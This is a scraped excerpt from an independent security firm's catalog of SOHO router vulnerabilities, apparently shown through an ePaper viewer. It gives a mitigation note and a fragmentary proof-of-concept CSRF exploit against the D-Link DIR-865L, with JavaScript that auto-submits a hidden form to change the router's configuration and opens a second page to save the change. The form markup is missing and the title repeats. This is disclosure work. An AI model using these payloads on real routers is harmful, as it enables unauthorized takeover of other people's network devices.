ISE SOHO Vulnerability Catalog Published - Independent Security ...
ISE SOHO Vulnerability Catalog Published - Independent Security ...
ISE SOHO Vulnerability Catalog Published - Independent Security ...
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
Solution<br />
♦ There currently is not a solution to this problem.<br />
♦ Restrict access to WAN services such as remote management to prevent an<br />
attacker from gaining access if an attack is successful.<br />
Proof of Concept Exploit<br />
HTML #1 - Modify Config.<br />
<br />
<br />
D-‐LINK DIR-‐865L CSRF <br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
function CSRF1() {document.dlinkXML.submit();};window.setTimeout(CSRF1,1000) <br />
function CSRF2() {window.open("http://192.168.0.100/dlinkCSRF2.html");};window.setTimeout(CSRF2,1000) <br />
<br />
<br />
<br />
HTML #2 - Save config. Modifications<br />
<br />
<br />
D-‐LINK DIR-‐865L CSRF <br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
58